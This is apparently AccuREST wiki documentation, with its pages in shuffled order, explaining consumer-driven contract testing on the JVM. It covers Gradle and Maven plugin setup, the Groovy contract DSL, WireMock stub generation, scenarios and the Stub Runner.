JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. 
Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. 
For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. 
Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. 
You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass 
StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. 
This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*[:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . 
Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. 
By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. 
Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. 
In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. 
Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. 
